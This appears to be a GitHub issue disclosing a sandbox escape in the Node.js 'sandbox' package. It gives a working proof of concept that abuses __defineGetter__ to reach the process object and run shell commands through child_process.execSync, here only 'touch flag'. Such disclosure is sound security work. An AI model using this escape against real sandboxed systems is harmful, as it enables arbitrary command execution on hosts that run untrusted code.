Open seongil-wi opened 1 year ago
var Sandbox = require("sandbox") var code = ` try{ __defineGetter__("x", ); } catch(ret){ ret.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag'); } ` s = new Sandbox() s.run(code)
Sandbox can be escaped by calling __defineGetter__ or __defineSetter__ function. Also, we can execute arbitrary shell code using process module.
__defineGetter__
__defineSetter__
Sandbox can be escaped by calling
__defineGetter__
or__defineSetter__
function. Also, we can execute arbitrary shell code using process module.